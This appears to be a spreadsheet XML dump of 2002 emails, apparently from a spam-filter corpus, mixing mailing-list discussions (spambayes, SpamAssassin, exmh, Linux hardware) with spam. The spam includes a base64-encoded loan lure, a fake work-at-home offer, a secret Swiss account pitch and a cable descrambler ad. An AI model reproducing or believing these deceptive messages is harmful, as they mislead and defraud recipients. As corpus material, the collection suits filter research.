    <t xml:space="preserve">Subject: Private Label Reseller Hosting  -  Expires 9/30/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body topmargin=0 leftmargin=0&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width=537 
 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD style="FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: 
 Verdana, Tahoma, sans-serif" bgColor=#d6cfab width=736&gt;&lt;DIV style="width: 620; 
 height: 11"&gt;&amp;nbsp;&amp;nbsp;&lt;SPAN class=890164919-26062002&gt;&lt;FONT face=Arial 
 color=#0000ff size=2&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/DIV&gt;&lt;DIV&gt;&lt;SPAN 
 class=890164919-26062002&gt;&lt;FONT face=Arial color=#0000ff 
 size=2&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/DIV&gt;&lt;CENTER&gt;&lt;TABLE cellSpacing=0 cellPadding=0 
 width=540 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD style="FONT-SIZE: 12px; COLOR: black; 
 FONT-FAMILY: Verdana, Tahoma, sans-serif"&gt;&lt;IMG src="http://64.57.207.
 12/messhead3.gif" border=0 NOSEND=1 width=540 height=221&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD 
 style="FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: Verdana, Tahoma, 
 sans-serif" align=middle bgColor=white&gt;&lt;TABLE cellSpacing=0 cellPadding=0 
 width=470 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD class=text align=left&gt;&amp;nbsp;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD style="FONT-SIZE: 12px; COLOR: 
 black; FONT-FAMILY: Verdana, Tahoma, sans-serif" align=middle 
 bgColor=white&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width=495 
 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD class=text align=left width=495&gt;&lt;P align=center&gt;&lt;FONT 
 size=3&gt; &lt;SPAN style="FONT-WEIGHT: 700; FONT-FAMILY: Arial"&gt;Private Label 
 Reseller Hosting Plans&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;TABLE id=AutoNumber2 
 style="BORDER-COLLAPSE: collapse" borderColor=#ffffff height=71 cellSpacing=0 
 cellPadding=0 width=495 border=1&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD width=113 bgColor=#e7b659 
 height=14&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD align=middle width=189 bgColor=#e7b659 
 height=14&gt;&lt;font size=1&gt;&lt;b&gt;Starter Plan&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=201 bgColor=#e7b659 height=14&gt;&lt;font size=1&gt;&lt;b&gt;Midsize 
 Plan&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD align=middle width=177 bgColor=#e7b659 height=14&gt;&lt;font 
 size=1&gt;&lt;b&gt;SuperSIZE Plan&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right width=113 
 bgColor=#e7b659 height=14&gt;&lt;B&gt;&lt;FONT size=1&gt;Price&amp;nbsp;&amp;nbsp; 
 &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD align=middle width=189 bgColor=#d6cfab height=14&gt;&lt;FONT 
 size=1 face=Arial&gt;99.95/mo.&lt;/FONT&gt;&lt;/TD&gt;&lt;font face=Arial&gt;&lt;TD align=middle 
 width=201 bgColor=#d6cfab height=14&gt;&lt;font size=1&gt;259.95/mo.&lt;/font&gt;&lt;/TD&gt;&lt;TD 
 align=middle width=177 bgColor=#d6cfab height=14&gt;&lt;FONT size=1&gt;425.95/mo.
 &lt;/FONT&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right width=113 bgColor=#e7b659 
 height=14&gt;&lt;B&gt;&lt;FONT size=1&gt;Domains&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=189 bgColor=#d6cfab height=14&gt;&lt;FONT size=1 
 face=Arial&gt;75&lt;/FONT&gt;&lt;/TD&gt;&lt;font face=Arial&gt;&lt;TD align=middle width=201 
 bgColor=#d6cfab height=14&gt;&lt;font size=1&gt;Unlimited&lt;/font&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=177 bgColor=#d6cfab height=14&gt;&lt;FONT 
 size=1&gt;Unlimited&lt;/FONT&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right width=113 
 bgColor=#e7b659 height=12&gt;&lt;B&gt;&lt;FONT size=1&gt;Disk Space&amp;nbsp;&amp;nbsp; 
 &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD align=middle width=189 bgColor=#d6cfab height=12&gt;&lt;font 
 size=1&gt;2X 500 Mb&lt;/font&gt;&lt;font size=1 face=Arial&gt; &lt;/font&gt;&lt;/TD&gt;&lt;font 
 face=Arial&gt;&lt;TD align=middle width=201 bgColor=#d6cfab height=12&gt;&lt;font 
 size=1&gt;2X 1GB&lt;/font&gt;&lt;/TD&gt;&lt;TD align=middle width=177 bgColor=#d6cfab 
 height=12&gt;&lt;font size=1&gt;2X 10 GB&lt;/font&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right 
 width=113 bgColor=#e7b659 height=14&gt;&lt;B&gt;&lt;FONT size=1&gt;Bandwidth&amp;nbsp;&amp;nbsp; 
 &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD align=middle width=189 bgColor=#d6cfab height=14&gt;&lt;font 
 size=1 face=Arial&gt;2X 15 GB&lt;/font&gt;&lt;/TD&gt;&lt;font face=Arial&gt;&lt;TD align=middle 
 width=201 bgColor=#d6cfab height=14&gt;&lt;font size=1&gt;2x 50 GB&lt;/font&gt;&lt;/TD&gt;&lt;TD 
 align=middle width=177 bgColor=#d6cfab height=14&gt;&lt;FONT size=1&gt;2X 
 100GB&lt;/FONT&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right width=113 bgColor=#e7b659 
 height=14&gt;&lt;B&gt;&lt;FONT size=1&gt;Billing&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=189 bgColor=#d6cfab height=14&gt;&lt;FONT size=1 face=Arial&gt;7&lt;/FONT&gt;&lt;/TD&gt;&lt;font 
 face=Arial&gt;&lt;TD align=middle width=201 bgColor=#d6cfab height=14&gt;&lt;font 
 size=1&gt;50&lt;/font&gt;&lt;/TD&gt;&lt;TD align=middle width=177 bgColor=#d6cfab 
 height=14&gt;&lt;FONT size=1&gt;125&lt;/FONT&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align=right 
 width=113 bgColor=#FFFFFF height=13&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD align=middle width=189 
 bgColor=#FFFFFF height=13&gt;&lt;u&gt;&lt;b&gt;&lt;font size=1 color="#CE0018"&gt; &lt;a 
 href="http://www.sitehoster.net/rh_pricing_starter.asp?CCID=C1443x004"&gt; &lt;font 
 color="#CE0018"&gt;More Info&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/u&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=201 bgColor=#FFFFFF height=13&gt;&lt;u&gt;&lt;b&gt;&lt;font size=1 color="#CE0018"&gt; &lt;a 
 href="http://www.sitehoster.net/rh_pricing_midsize.asp?CCID=C1443x004"&gt; &lt;font 
 color="#CE0018"&gt;More Info&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/u&gt;&lt;/TD&gt;&lt;TD align=middle 
 width=177 bgColor=#FFFFFF height=13&gt;&lt;u&gt;&lt;b&gt;&lt;font size=1 color="#CE0018"&gt; &lt;a 
 href="http://www.sitehoster.net/rh_pricing_supersize.asp?CCID=C1443x004"&gt; 
 &lt;font color="#CE0018"&gt;More 
 Info&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/u&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;&lt;font size=2&gt;That's 
 right, we will DOUBLE these already huge amounts of Disk Space and Bandwidth: 
 only &lt;/font&gt;&lt;b&gt; &lt;font size=2&gt;Available until 9/30/2002 6 P.M. EST.
 &lt;/font&gt;&lt;/b&gt;&lt;/P&gt;&lt;P&gt;&lt;b&gt;&lt;font size=2&gt;Think this offer can't get any better? Think 
 again!&amp;nbsp; If you sign - up for a six (6) month hosting package,&amp;nbsp; we 
 are going to give you 1 free month of service.&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;&lt;P&gt;&lt;font 
 size=2&gt;We offer a &lt;b&gt;30 Day money back guarantee &lt;/b&gt;so this offer is 
 absolutely risk free. Come find out what it is like to host with a company 
 that has &lt;b&gt;Real Live 24/7 Support&lt;/b&gt; and &lt;b&gt;enough bandwidth to host the 
 largest web sites worldwide.&lt;/b&gt;&lt;/font&gt;&lt;/P&gt;&lt;P align=center&gt;&lt;FONT size=3&gt;&lt;B&gt;Key 
 Features of Reseller Plans&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;TABLE id=AutoNumber3 
 style="BORDER-COLLAPSE: collapse" borderColor=#111111 cellSpacing=0 
 cellPadding=0 width="100%" border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD vAlign=top width="50%"&gt;&lt;UL 
 style="FONT-WEIGHT: normal; FONT-SIZE: 9pt; COLOR: black; MARGIN-RIGHT: 15px; 
 FONT-FAMILY: Arial,Verdana,Helvetica"&gt;&lt;LI&gt;&lt;FONT face=Arial size=1&gt;Automated 
 customer signup&lt;LI&gt;Automated domain registration&lt;LI&gt;Credit card 
 processing&lt;LI&gt;Recurrent billing&lt;LI&gt;E-mail&amp;nbsp; invoicing&lt;LI&gt;Fully automated 
 set-up &lt;/FONT&gt;&lt;LI&gt;&lt;FONT face=Arial size=1&gt;Includes Win2000 AND Linux 
 OS&lt;LI&gt;Completely brandable interface&lt;LI&gt;Multilingual support&lt;LI&gt;Flexible end 
 user interface&lt;/LI&gt;&lt;LI&gt;&lt;b&gt;Control Panel Walk Through provided by our 
 techs&lt;/b&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;TD vAlign=top width="50%"&gt;&lt;FONT face=Verdana 
 size=1&gt;&lt;UL style="FONT-WEIGHT: normal; FONT-SIZE: 9pt; COLOR: black; 
 MARGIN-RIGHT: 15px; FONT-FAMILY: Arial,Verdana,Helvetica"&gt;&lt;LI&gt;&lt;FONT face=Arial 
 size=1&gt;Shared or Dedicated IPs&lt;LI&gt;Database hosting (MySQL, MS SQL, PostgreSQL, 
 Access and ODBC) &lt;/FONT&gt;&lt;FONT face="Arial Black"&gt;&lt;LI&gt;&lt;/FONT&gt;&lt;FONT face=Arial 
 size=1&gt;E-commerce support (Miva and osCommerce) &lt;/FONT&gt;&lt;FONT 
 face=Arial&gt;&lt;/FONT&gt;&lt;FONT face="Arial Black"&gt;&lt;LI&gt;&lt;/FONT&gt;&lt;FONT face=Arial 
 size=1&gt;ASP PHP ColdFusion &lt;/FONT&gt;&lt;FONT face=Arial&gt;&lt;/FONT&gt;&lt;LI&gt;&lt;FONT 
 size=1&gt;&lt;FONT face=Arial&gt;Integrated WebMail &lt;/FONT&gt;&lt;FONT face="Arial 
 Black"&gt;&lt;LI&gt;&lt;I&gt;&lt;/FONT&gt;&lt;SPAN style="FONT-STYLE: normal"&gt;&lt;FONT 
 face=Arial&gt;Streaming Media hosting &lt;/FONT&gt;&lt;/SPAN&gt;&lt;FONT 
 face=Arial&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;LI&gt;&lt;FONT face=Arial&gt;&lt;FONT size=1&gt;Shared FTP 
 access&amp;nbsp; &lt;/FONT&gt;&lt;LI&gt;&lt;FONT size=1&gt;Anonymous FTP&lt;LI&gt;Error Document 
 management&lt;LI&gt;Shared SSL support &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial size=1&gt;&lt;LI&gt;CGI 
 scripts&lt;LI&gt;And Much more...&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial size=1&gt; 
 &lt;/FONT&gt;&lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P align=center&gt;&lt;B&gt;&lt;I&gt;&lt;FONT 
 size=2&gt;This offer is a Month End Closeout so please act before 9/30/2002 
 &lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;&lt;/P&gt;&lt;P align=center&gt;&lt;font color="#CE0018"&gt;&lt;b&gt;&lt;i&gt;Sign up before 
 Wed 9/25/2002 and receive $50 off of the set up fee&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/P&gt;&lt;TABLE 
 cellSpacing=0 cellPadding=3 width="100%" border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD&gt;&lt;HR 
 align=center width="100%" color=gray noShade SIZE=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;B&gt;&lt;FONT 
 face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;For more information 
 &lt;/FONT&gt;&amp;nbsp;&lt;FONT face=Verdana color=#ce0018 size=2&gt;call 1-866-858-HOST 
 (4678)&amp;nbsp;
 &lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;TABLE 
 cellSpacing=0 cellPadding=0 width=490 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD 
 style="FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: Verdana, Tahoma, 
 sans-serif" vAlign=bottom align=right&gt;&lt;DIV&gt;&lt;FONT face=Arial color=#0000ff 
 size=2&gt;&lt;/FONT&gt;&lt;BR&gt;&amp;nbsp;&lt;SPAN class=890164919-26062002&gt;&lt;FONT face=Arial 
 color=#0000ff size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/DIV&gt;&lt;DIV&gt;&lt;SPAN 
 class=890164919-26062002&gt;&amp;nbsp;
 &lt;/SPAN&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;TABLE 
 height=29 cellSpacing=0 cellPadding=0 width=540 border=0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD 
 style="FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: Verdana, Tahoma, 
 sans-serif" width=28 height=29&gt;&lt;IMG src="http://64.57.207.12/rnd1.gif" 
 border=0 NOSEND=1 width=30 height=28&gt;&lt;/TD&gt;&lt;TD class=footer align=left 
 width=484 background=http://zero-debt.net/bottom_bg.gif height=29&gt;&lt;FONT 
 face=Arial size=2&gt;&lt;B&gt;&lt;FONT size=2&gt;&amp;nbsp;&lt;U&gt;&lt;FONT color=#ffffff&gt;&lt;a "&amp;gt;&amp;lt;
 FONT color=#ffffff&amp;gt;&amp;lt;/FONT&amp;gt;&amp;lt;FONT color=#ffffff&amp;gt;&amp;lt;a href=" 
 mailto:remove-listserv@sitehoster.net" 
 href="mailto:remove-listserv-yourhostbiz@sitehoster.net"&gt;&lt;font 
 color="#FFFFFF"&gt;Unsubscribe&lt;/font&gt;&lt;/a&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/U&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;
 B&gt;&lt;FONT size=2&gt;|&lt;/FONT&gt;&lt;FONT size=1&gt;Make sure to include all addresses you 
 want removed&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD style="FONT-SIZE: 12px; COLOR: black; 
 FONT-FAMILY: Verdana, Tahoma, sans-serif" width=28 height=29&gt;&lt;IMG 
 src="http://64.57.207.12/rnd2.gif" border=0 NOSEND=1 width=30 
 height=28&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;P&gt;&lt;BR&gt;&lt;BR&gt;&amp;nbsp;
 &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/FORM&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/H
 TML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bush veto on Middle East talks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572777,215/
 Date: 2002-10-05T03:05:37+01:00
 Humiliating rebuff for Blair initiative comes only days after plan was 
 announced at the Labour conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">
     &gt;&gt; If and when we package this, perhaps we should use Barry's trick ...
     Greg&gt; It's not a *trick*!  It just requires this
     Greg&gt;   package_dir = {'spambayes': '.'}
     Greg&gt; in the setup script.
 That has the nasty side effect of placing all .py files in the package.
 What about obvious executable scripts (like timtest or hammie)?  How can I
 keep them out of the package?
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sorting
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to do a global Sort command? Here's the situation: I like to 
 sort by date every folder. I'm cleaning up my inbox from most recent to oldest, 
 since I find this direction most efficient (I guess because it helps me 
 recognize the significance of individual, old messages). But this adds messages 
 to my other folders in the wrong order. When I'm done, I'd like to re-sort all 
 the folders I've changed.
 --
 rick
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ** You're -Approved-! **
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B0_35C58D0E.D7267B06
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQo8Ym9keT4NCjxmb250IGNvbG9yPSJmZmZmZmYiPm1hcnRpbmV6
 PC9mb250Pg0KPHA+WW91ciBob21lIHJlZmluYW5jZSBsb2FuIGlzIGFwcHJv
 dmVkITxicj48L3A+PGJyPg0KPHA+VG8gZ2V0IHlvdXIgYXBwcm92ZWQgYW1v
 dW50IDxhIGhyZWY9Imh0dHA6Ly8yMDAuMzIuMy4xMjEvaW5kZXguaHRtIj5n
 bw0KaGVyZTwvYT4uPC9wPg0KPGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJy
 Pjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+
 PGJyPg0KPHA+VG8gYmUgZXhjbHVkZWQgZnJvbSBmdXJ0aGVyIG5vdGljZXMg
 PGEgaHJlZj0iaHR0cDovLzIwMC4zMi4zLjEyMS9yZW1vdmUuaHRtbCI+Z28N
 CmhlcmU8L2E+LjwvcD4NCjxmb250IGNvbG9yPSJmZmZmZmYiPm1hcnRpbmV6
 PC9mb250Pg0KPC9ib2R5Pg0KPGZvbnQgY29sb3I9ImZmZmZmZiI+MWdhdGUN
 CjwvaHRtbD4NCjA0NTRZdlFEOC00NjdCWllDMjYyMHhIemc2LTk2bDI3
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FORTUNE 500 WORK AT HOME REPS NEEDED!
</t>
  </si>
  <si>
    <t xml:space="preserve">Immediate Help Needed.  We are a fortune 500 company that is 
 growing at a tremendous rate of over 1000% per year. We simply cannot 
 keep up. We are looking for motivated individuals who are looking to 
 earn a substantial income working from home. 
 This is a real opportunity to make an excellent income from home. No 
 experience is required.  We will provide you with any training you may need. 
 We are looking for energetic and self motivated people.  If that is you 
 than click on the link below and complete our online information request 
 form, 
 and one of our employment specialist will contact you. 
 http://ter.netblah.com:27000
 So if you are looking to be employed at home, with a career that will 
 provide you vast opportunities and a substantial income, please fill 
 out our online information request form here now: 
 http://ter.netblah.com:27000
 To be removed from our list simply click on the link below now: 
 http://ter.netblah.com:27000
 1631Pl5
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] From: and To: are my address
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002 the voices made CertaintyTech write:
 &gt; Recently I have been receiving Spam where both the From: and To: address are
 &gt; set to my address therefore getting thru due to AWL.  Any suggestions on
 &gt; this one?  I could turn off AWL but it does have advantages.  BTW, I use a
 &gt; site-wide AWL.
  Use cron to remove your address from the AWL daily...?!
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'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</si>
  <si>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Re: Kill Your Gods
</t>
  </si>
  <si>
    <t xml:space="preserve">Hindus got 3 billion gods..... So, losing one is no
 big deal, really....
 Its just sick that they killed an innocent animal,
 which doesn't even know the concept of "God".
 Sateesh
 --- Tom &lt;tomwhore@slack.net&gt; wrote:
 &gt; Hindus mourn 'monkey god'
 &gt; 
 &gt; 
 &gt; By Omer Farooq
 &gt; BBC reporter in Hyderabad
 &gt; 
 &gt; Hundreds of people have attended the funeral of a
 &gt; monkey which became
 &gt; revered as a divine incarnation of a Hindu god in
 &gt; the southern Indian
 &gt; state of Andhra Pradesh.
 &gt; 
 &gt; 
 &gt; The monkey was quite old and both its hind legs were
 &gt; paralysed
 &gt; 
 &gt; Animal rights campaigners say the monkey died of
 &gt; starvation and exhaustion
 &gt; after being trapped in a temple for a month by
 &gt; over-zealous worshippers.
 &gt; 
 &gt; The animal was cremated in Anantapur district, 400
 &gt; kilometres (250 miles)
 &gt; south of the state capital, Hyderabad, on Sunday.
 &gt; 
 &gt; It had not eaten for three weeks.
 &gt; 
 &gt; Last rites were performed by priests in the village
 &gt; of Timmiganipally in
 &gt; the presence of hundreds of devotees who had come to
 &gt; believe that the
 &gt; monkey was a reincarnation of the Hindu monkey god,
 &gt; Hanuman.
 &gt; 
 &gt; Garlanded
 &gt; 
 &gt; One animal rights activist said his group's efforts
 &gt; to save the monkey had
 &gt; failed because of the blind faith of the people.
 &gt; 
 &gt; 
 &gt; The monkey's death came a day after he and others
 &gt; tried to move the animal
 &gt; out of the temple, but were prevented by villagers.
 &gt; 
 &gt; The monkey, which was found perched on top of an
 &gt; idol of Hanuman a month
 &gt; ago, attracted hundreds of devotees every day from
 &gt; surrounding villages,
 &gt; as well as from the neighbouring state of Karnataka.
 &gt; 
 &gt; Devotees showered the monkey with fruit and flowers
 &gt; and worshipped it
 &gt; around the clock.
 &gt; 
 &gt; 'Exploited'
 &gt; 
 &gt; Locals said they believed that Lord Hanuman was
 &gt; visiting the village, as
 &gt; the temple had stopped daily rituals after a dispute
 &gt; between two groups of
 &gt; residents.
 &gt; 
 &gt; But animal rights campaigners complained that the
 &gt; animal was being
 &gt; mistreated.
 &gt; 
 &gt; They filed a petition in the state's High Court
 &gt; saying the monkey had been
 &gt; forcibly confined in the temple.
 &gt; 
 &gt; The group also alleged that people's religious
 &gt; feelings were being
 &gt; exploited to make money.
 &gt; 
 &gt; The court then ordered the local administration to
 &gt; rescue the monkey - but
 &gt; villagers prevented officials from taking him for
 &gt; treatment in time.
 &gt; 
 &gt; 
 &gt; 
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Finance - Get real-time stock quotes
 http://finance.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt;&gt;There is absolutely no way to use a conventional 3.5" drive with a
 &gt;&gt;laptop directly.
 &gt;  Ah, they told me that about my A1200.
 &gt; 
 &gt;  Worked a charm. Until I dropped the disk one day onto concrete.
 Go on. Tell them how long the /first/ one lasted.
 I vote external firewire if the laptop has the ports for it.
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Swiss Iinternet account with ATM card
</t>
  </si>
  <si>
    <t xml:space="preserve">HAVE A SECURE SWISS SECRET INTERNET ACCOUNT WITH ATM CARD
 No Corporation formation needed.
 Only such account backed by Swiss Government.
 Account under Swiss Banking Secrecy.
 No Personal appearance necessary.
 Stable Swiss Government and Economy. 
 Swiss Bancomat ATM card included at no extra cost
 Good at over 420,000 ATM machine locations world wide.
 Complete PRIVATE Internet access and control with triple security key code protection
 Have this extra convenience and security today. Get full details at http://swissatm.com
 The email is not unsolicited and complies with
 industry standard guidelines. If you have any questions
 please contact us at
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: storage bits
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "U" == Udhay Shankar N &lt;Udhay&gt; writes:
     U&gt; At 12:32 PM 12/28/00 -0600, Adam Rifkin wrote:
     &gt;&gt; I repeat, IBM 76.8Gb ultra dma/100 hard drive at Fry's for
     &gt;&gt; $375...  "home of fast, friendly courteous service! (R)"
     U&gt; less than two years later, we have 320 GB for the same price:
 So then why does my webhost _still_ only give me 200MB?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: introductions
</t>
  </si>
  <si>
    <t xml:space="preserve">the doctor wears many hats, including but not limited to a rubber skullcap
 for playing water polo, a beret for making sparkling wines, and an oversized
 fedora to deflect his own cigar smoke, which he regularly blows up my ...
 &lt;cough&gt;
 geege
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Jim
 Whitehead
 Sent: Monday, September 16, 2002 2:08 PM
 To: FoRK
 Subject: RE: introductions
 &gt; Aren't you Dr. Gregory A. Bolcer, Dutch Uncle of P2P?
 I thought he was Greg Bolcer, recovering XPilot &amp; Doom junkie...
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Collect Your Money! Time:1:30:33 AM
</t>
  </si>
  <si>
    <t xml:space="preserve">PROFESSIONAL, EFFECTIVE DEBT COLLECTION SERVICES AVAILABLE
 For the last seventeen years, National Credit Systems, Inc. has been providing
 top flight debt collection services to over 15,000 businesses, institutions, and 
 healthcare providers.
 We charge only a low-flat fee (less than $20) per account, and all proceeds are 
 forwarded to you directly -- not to your collections agency.
 If you wish, we will report unpaid accounts to Experian (formerly TRW), 
 TRANSUNION, and Equifax. There is no charge for this important service.
 PLEASE LET US KNOW IF WE CAN BE OF SERVICE TO YOU.
 Simply reply to debt_collectors@chmailnet.com with the following instructions 
 in the Subject field - 
 REMOVE  --  Please remove me from your mailing list.
 EMAIL   --  Please email more information.
 FAX     --  Please fax more information.
 MAIL    --  Please snailmail more information.
 CALL    --  Please have a representative call.
 Indicate the best time to telephone and any necessary addresses and 
 telephone/fax numbers in the text of your reply.
 If you prefer you can always telephone us during normal business hours 
 at (212) 213-3000 Ext 1425.
 Thank you.
 P.S. -- If you are not in need of our services at this time, please retain this 
 message for future use or past it on to a friend. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Watch all the channels you want. !!VURPW
</t>
  </si>
  <si>
    <t xml:space="preserve">Newest Universal Cable Descrambler Box:  ViewMaster 4000 +
 *** Watch ALL channels your local cable company offer. 
 *** Fully Tested and Compatible with 98% of US cable network. 
 *** 90 days money back guarantee !!! 
 http://www.freshleadseveryday89.com/descrambler/
 ---------------------------------------------------------------------------------------------------
 To be remove from farther mailing: simply replay to this message.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: From salon.com - Forbidden thoughts about 9/11
</t>
  </si>
  <si>
    <t xml:space="preserve">i though this was all rather interesting, first bit of 9/11 coverage that 
 i've liked.
 http://www.salon.com/mwt/feature/2002/09/11/forbidden_letters/index.html
 Chris
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Virus &amp; Security Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/442_viriusHEAD_NEWSLTR.gif" width="442" height="60" border="0" alt="CNET Virus &amp; Security Newsletter"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
